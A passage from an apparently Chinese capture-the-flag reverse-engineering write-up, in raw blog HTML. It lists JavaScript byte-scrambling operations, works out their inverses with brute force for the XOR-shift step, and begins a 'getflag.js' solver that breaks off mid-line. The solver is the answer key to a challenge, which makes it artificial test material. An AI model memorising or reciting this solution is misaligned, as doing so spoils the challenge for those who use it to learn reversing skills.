class="number">0xff</span>|f[<span class="number">10</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">13</span>]=f[<span class="number">13</span>]^(f[<span class="number">13</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">1</span>]-=f[<span class="number">27</span>],f[<span class="number">1</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">13</span>]=(((f[<span class="number">13</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">13</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">11</span>]=(((f[<span class="number">11</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">11</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">2</span>]+=f[<span class="number">17</span>],f[<span class="number">2</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">6</span>]=f[<span class="number">6</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">6</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">10</span>]=f[<span class="number">10</span>]^(f[<span class="number">10</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">4</span>]-=f[<span class="number">8</span>],f[<span class="number">4</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]-=f[<span class="number">2</span>],f[<span class="number">1</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">0</span>]-=f[<span class="number">14</span>],f[<span class="number">0</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">11</span>]=f[<span class="number">11</span>]^(f[<span class="number">11</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">7</span>]-=f[<span class="number">17</span>],f[<span class="number">7</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">18</span>]=~f[<span class="number">18</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">0</span>]^=f[<span class="number">16</span>]</span><br><span class="line">f[<span class="number">12</span>]+=f[<span class="number">13</span>],f[<span class="number">12</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">23</span>]=~f[<span class="number">23</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">10</span>]-=f[<span class="number">7</span>],f[<span class="number">10</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">29</span>]=f[<span class="number">29</span>]^(f[<span class="number">29</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">3</span>]=f[<span class="number">3</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">3</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">20</span>]^=f[<span class="number">3</span>]</span><br><span class="line">f[<span class="number">8</span>]=f[<span class="number">8</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">8</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">25</span>]-=f[<span class="number">24</span>],f[<span class="number">25</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">26</span>]=f[<span class="number">26</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">26</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">10</span>]=f[<span class="number">10</span>]^(f[<span class="number">10</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">26</span>]=f[<span class="number">26</span>]^(f[<span class="number">26</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">16</span>]-=f[<span class="number">7</span>],f[<span class="number">16</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">8</span>]=~f[<span class="number">8</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">14</span>]^=f[<span class="number">13</span>]</span><br><span class="line">f[<span class="number">3</span>]+=f[<span class="number">24</span>],f[<span class="number">3</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">15</span>]=(((f[<span class="number">15</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">15</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">15</span>]-=f[<span class="number">28</span>],f[<span class="number">15</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">10</span>]=f[<span class="number">10</span>]^(f[<span class="number">10</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">17</span>]+=f[<span class="number">15</span>],f[<span class="number">17</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">22</span>]-=f[<span class="number">2</span>],f[<span class="number">22</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">27</span>]=~f[<span class="number">27</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">5</span>]=f[<span class="number">5</span>]^(f[<span class="number">5</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">20</span>]=~f[<span class="number">20</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">13</span>]^=f[<span class="number">24</span>]</span><br><span class="line">f[<span class="number">23</span>]^=f[<span class="number">21</span>]</span><br><span class="line">f[<span class="number">2</span>]-=f[<span class="number">23</span>],f[<span class="number">2</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">5</span>]+=f[<span class="number">20</span>],f[<span class="number">5</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">24</span>]^=f[<span class="number">12</span>]</span><br><span class="line">f[<span class="number">9</span>]-=f[<span class="number">8</span>],f[<span class="number">9</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">11</span>]=f[<span class="number">11</span>]^(f[<span class="number">11</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">27</span>]-=f[<span class="number">14</span>],f[<span class="number">27</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">18</span>]+=f[<span class="number">25</span>],f[<span class="number">18</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">6</span>]+=f[<span class="number">26</span>],f[<span class="number">6</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">7</span>]=f[<span class="number">7</span>]^(f[<span class="number">7</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">28</span>]=f[<span class="number">28</span>]^(f[<span class="number">28</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">10</span>]-=f[<span class="number">1</span>],f[<span class="number">10</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">18</span>]-=f[<span class="number">14</span>],f[<span class="number">18</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">20</span>]+=f[<span class="number">14</span>],f[<span class="number">20</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">15</span>]-=f[<span class="number">17</span>],f[<span class="number">15</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">0</span>]=~f[<span class="number">0</span>]&amp;<span class="number">0xff</span></span><br></pre></td></tr></table></figure>

<p>接下来就是所有语句倒序，并做逆运算。</p>
<p>替换+去重，只有以下这些算法，需要获得所有逆运算方式。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">A=~A&amp;<span class="number">0xff</span></span><br><span class="line">A-=B,A&amp;=<span class="number">0xff</span></span><br><span class="line">A+=B,A&amp;=<span class="number">0xff</span></span><br><span class="line">A=A^(A&gt;&gt;<span class="number">1</span>)</span><br><span class="line">A^=B</span><br><span class="line">A=(((A*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(A*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">A=A&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|A&gt;&gt;<span class="number">7</span></span><br><span class="line">A=A&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|A&gt;&gt;<span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>逆运算整理：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 1、原句不动可逆向</span></span><br><span class="line">f[<span class="number">24</span>]=~f[<span class="number">24</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">24</span>]=~f[<span class="number">24</span>]&amp;<span class="number">0xff</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 2/3、+ 和 - 互换即可</span></span><br><span class="line">f[<span class="number">1</span>]+=f[<span class="number">24</span>],f[<span class="number">1</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]-=f[<span class="number">24</span>],f[<span class="number">1</span>]&amp;=<span class="number">0xff</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 4、不知道怎么逆向ing，卡在这里</span></span><br><span class="line">f[<span class="number">14</span>]=f[<span class="number">14</span>]^(f[<span class="number">14</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">// 5、直接可逆</span></span><br><span class="line">f[<span class="number">23</span>]^=f[<span class="number">21</span>]</span><br><span class="line">f[<span class="number">23</span>]^=f[<span class="number">21</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">// 6、直接可逆</span></span><br><span class="line">f[<span class="number">15</span>]=(((f[<span class="number">15</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">15</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">15</span>]=(((f[<span class="number">15</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">15</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 7、按下面改，1和7互换</span></span><br><span class="line">f[<span class="number">11</span>]=f[<span class="number">11</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">11</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">11</span>]=f[<span class="number">11</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">11</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 8、按下面改，7和1互换</span></span><br><span class="line">f[<span class="number">20</span>]=f[<span class="number">20</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">20</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">20</span>]=f[<span class="number">20</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">20</span>]&gt;&gt;<span class="number">7</span></span><br></pre></td></tr></table></figure>

<p>既然逆不出来，那就直接爆破大招吧，用for来替换：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// f[16]=f[16]^(f[16]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">16</span>]) &#123;</span><br><span class="line">        f[<span class="number">16</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="0x03-EXP"><a href="#0x03-EXP" class="headerlink" title="0x03 EXP"></a>0x03 EXP</h2><p>getflag.js：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br><span class="line">325</span><br><span class="line">326</span><br><span class="line">327</span><br><span class="line">328</span><br><span class="line">329</span><br><span class="line">330</span><br><span class="line">331</span><br><span class="line">332</span><br><span class="line">333</span><br><span class="line">334</span><br><span class="line">335</span><br><span class="line">336</span><br><span class="line">337</span><br><span class="line">338</span><br><span class="line">339</span><br><span class="line">340</span><br><span class="line">341</span><br><span class="line">342</span><br><span class="line">343</span><br><span class="line">344</span><br><span class="line">345</span><br><span class="line">346</span><br><span class="line">347</span><br><span class="line">348</span><br><span class="line">349</span><br><span class="line">350</span><br><span class="line">351</span><br><span class="line">352</span><br><span class="line">353</span><br><span class="line">354</span><br><span class="line">355</span><br><span class="line">356</span><br><span class="line">357</span><br><span class="line">358</span><br><span class="line">359</span><br><span class="line">360</span><br><span class="line">361</span><br><span class="line">362</span><br><span class="line">363</span><br><span class="line">364</span><br><span class="line">365</span><br><span class="line">366</span><br><span class="line">367</span><br><span class="line">368</span><br><span class="line">369</span><br><span class="line">370</span><br><span class="line">371</span><br><span class="line">372</span><br><span class="line">373</span><br><span class="line">374</span><br><span class="line">375</span><br><span class="line">376</span><br><span class="line">377</span><br><span class="line">378</span><br><span class="line">379</span><br><span class="line">380</span><br><span class="line">381</span><br><span class="line">382</span><br><span class="line">383</span><br><span class="line">384</span><br><span class="line">385</span><br><span class="line">386</span><br><span class="line">387</span><br><span class="line">388</span><br><span class="line">389</span><br><span class="line">390</span><br><span class="line">391</span><br><span class="line">392</span><br><span class="line">393</span><br><span class="line">394</span><br><span class="line">395</span><br><span class="line">396</span><br><span class="line">397</span><br><span class="line">398</span><br><span class="line">399</span><br><span class="line">400</span><br><span class="line">401</span><br><span class="line">402</span><br><span class="line">403</span><br><span class="line">404</span><br><span class="line">405</span><br><span class="line">406</span><br><span class="line">407</span><br><span class="line">408</span><br><span class="line">409</span><br><span class="line">410</span><br><span class="line">411</span><br><span class="line">412</span><br><span class="line">413</span><br><span class="line">414</span><br><span class="line">415</span><br><span class="line">416</span><br><span class="line">417</span><br><span class="line">418</span><br><span class="line">419</span><br><span class="line">420</span><br><span class="line">421</span><br><span class="line">422</span><br><span class="line">423</span><br><span class="line">424</span><br><span class="line">425</span><br><span class="line">426</span><br><span class="line">427</span><br><span class="line">428</span><br><span class="line">429</span><br><span class="line">430</span><br><span class="line">431</span><br><span class="line">432</span><br><span class="line">433</span><br><span class="line">434</span><br><span class="line">435</span><br><span class="line">436</span><br><span class="line">437</span><br><span class="line">438</span><br><span class="line">439</span><br><span class="line">440</span><br><span class="line">441</span><br><span class="line">442</span><br><span class="line">443</span><br><span class="line">444</span><br><span class="line">445</span><br><span class="line">446</span><br><span class="line">447</span><br><span class="line">448</span><br><span class="line">449</span><br><span class="line">450</span><br><span class="line">451</span><br><span class="line">452</span><br><span class="line">453</span><br><span class="line">454</span><br><span class="line">455</span><br><span class="line">456</span><br><span class="line">457</span><br><span class="line">458</span><br><span class="line">459</span><br><span class="line">460</span><br><span class="line">461</span><br><span class="line">462</span><br><span class="line">463</span><br><span class="line">464</span><br><span class="line">465</span><br><span class="line">466</span><br><span class="line">467</span><br><span class="line">468</span><br><span class="line">469</span><br><span class="line">470</span><br><span class="line">471</span><br><span class="line">472</span><br><span class="line">473</span><br><span class="line">474</span><br><span class="line">475</span><br><span class="line">476</span><br><span class="line">477</span><br><span class="line">478</span><br><span class="line">479</span><br><span class="line">480</span><br><span class="line">481</span><br><span class="line">482</span><br><span class="line">483</span><br><span class="line">484</span><br><span class="line">485</span><br><span class="line">486</span><br><span class="line">487</span><br><span class="line">488</span><br><span class="line">489</span><br><span class="line">490</span><br><span class="line">491</span><br><span class="line">492</span><br><span class="line">493</span><br><span class="line">494</span><br><span class="line">495</span><br><span class="line">496</span><br><span class="line">497</span><br><span class="line">498</span><br><span class="line">499</span><br><span class="line">500</span><br><span class="line">501</span><br><span class="line">502</span><br><span class="line">503</span><br><span class="line">504</span><br><span class="line">505</span><br><span class="line">506</span><br><span class="line">507</span><br><span class="line">508</span><br><span class="line">509</span><br><span class="line">510</span><br><span class="line">511</span><br><span class="line">512</span><br><span class="line">513</span><br><span class="line">514</span><br><span class="line">515</span><br></pre></td><td class="code"><pre><span class="line">f = [<span class="number">209</span>,<span class="number">158</span>,<span class="number">225</span>,<span class="number">147</span>,<span class="number">180</span>,<span class="number">97</span>,<span class="number">253</span>,<span class="number">141</span>,<span class="number">20</span>,<span class="number">82</span>,<span class="number">231</span>,<span class="number">101</span>,<span class="number">154</span>,<span class="number">203</span>,<span class="number">31</span>,<span class="number">71</span>,<span class="number">220</span>,<span class="number">62</span>,<span class="number">212</span>,<span class="number">69</span>,<span class="number">200</span>,<span class="number">235</span>,<span class="number">79</span>,<span class="number">241</span>,<span class="number">145</span>,<span class="number">177</span>,<span class="number">171</span>,<span class="number">250</span>,<span class="number">121</span>,<span class="number">105</span>]</span><br><span class="line"></span><br><span class="line">f[<span class="number">0</span>]=~f[<span class="number">0</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">15</span>]+=f[<span class="number">17</span>],f[<span class="number">15</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">20</span>]-=f[<span class="number">14</span>],f[<span class="number">20</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">18</span>]+=f[<span class="number">14</span>],f[<span class="number">18</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">10</span>]+=f[<span class="number">1</span>],f[<span class="number">10</span>]&amp;=<span class="number">0xff</span></span><br><span class="line"><span class="comment">// f[28]=f[28]^(f[28]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">28</span>]) &#123;</span><br><span class="line">        f[<span class="number">28</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// f[7]=f[7]^(f[7]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">7</span>]) &#123;</span><br><span class="line">        f[<span class="number">7</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">f[<span class="number">6</span>]-=f[<span class="number">26</span>],f[<span class="number">6</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">18</span>]-=f[<span class="number">25</span>],f[<span class="number">18</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">27</span>]+=f[<span class="number">14</span>],f[<span class="number">27</span>]&amp;=<span class="number">0xff</span></span><br><span class="line"><span class="comment">// f[11]=f[11]^(f[11]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">11</span>]) &#123;</span><br><span class="line">        f[<span class="number">11</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">9</span>]+=f[<span class="number">8</span>],f[<span class="number">9</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">24</span>]^=f[<span class="number">12</span>]</span><br><span class="line">f[<span class="number">5</span>]-=f[<span class="number">20</span>],f[<span class="number">5</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">2</span>]+=f[<span class="number">23</span>],f[<span class="number">2</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">23</span>]^=f[<span class="number">21</span>]</span><br><span class="line">f[<span class="number">13</span>]^=f[<span class="number">24</span>]</span><br><span class="line">f[<span class="number">20</span>]=~f[<span class="number">20</span>]&amp;<span class="number">0xff</span></span><br><span class="line"><span class="comment">// f[5]=f[5]^(f[5]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">5</span>]) &#123;</span><br><span class="line">        f[<span class="number">5</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">27</span>]=~f[<span class="number">27</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">22</span>]+=f[<span class="number">2</span>],f[<span class="number">22</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">17</span>]-=f[<span class="number">15</span>],f[<span class="number">17</span>]&amp;=<span 